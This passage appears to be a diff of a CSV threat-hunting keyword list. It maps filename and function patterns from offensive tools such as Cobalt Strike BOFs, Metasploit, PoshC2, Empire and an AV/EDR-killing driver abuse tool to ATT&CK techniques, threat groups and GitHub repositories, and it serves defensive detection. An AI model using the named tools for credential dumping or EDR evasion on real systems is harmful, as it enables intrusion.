- Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_inject_userwx*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*process_killer.exe*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*process_memdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*process_mimikatz*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*process_protection_enum *","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. 
limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","0","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*process_protection_enum*.dmp*","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","","N/A","","","" "*process_protection_enum.*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" 
@@ -15182,52 +15350,52 @@ "*Process_Protection_Level_BOF/*","offensive_tool_keyword","cobaltstrike","A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Process_Protection_Level_BOF","1","1","N/A","10","10","48","7","2021-08-30T00:18:57Z","2021-08-29T23:08:22Z" "*process_snapshot.exe*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*ProcessCommandChannelImplantMessage*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - 
T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" -"*ProcessDestroy.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*ProcessDestroy.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*ProcessDestroy.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*ProcessDestroy.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x64.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*ProcessDestroy.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*ProcessEncryptedC2Request*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - 
T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" -"*ProcessFileZillaFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessHerpaderping_x64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ProcessHerpaderping_x86*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ProcessHerpaderpingTemplate*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ProcessFileZillaFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessHerpaderping_x64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ProcessHerpaderping_x86*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ProcessHerpaderpingTemplate*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
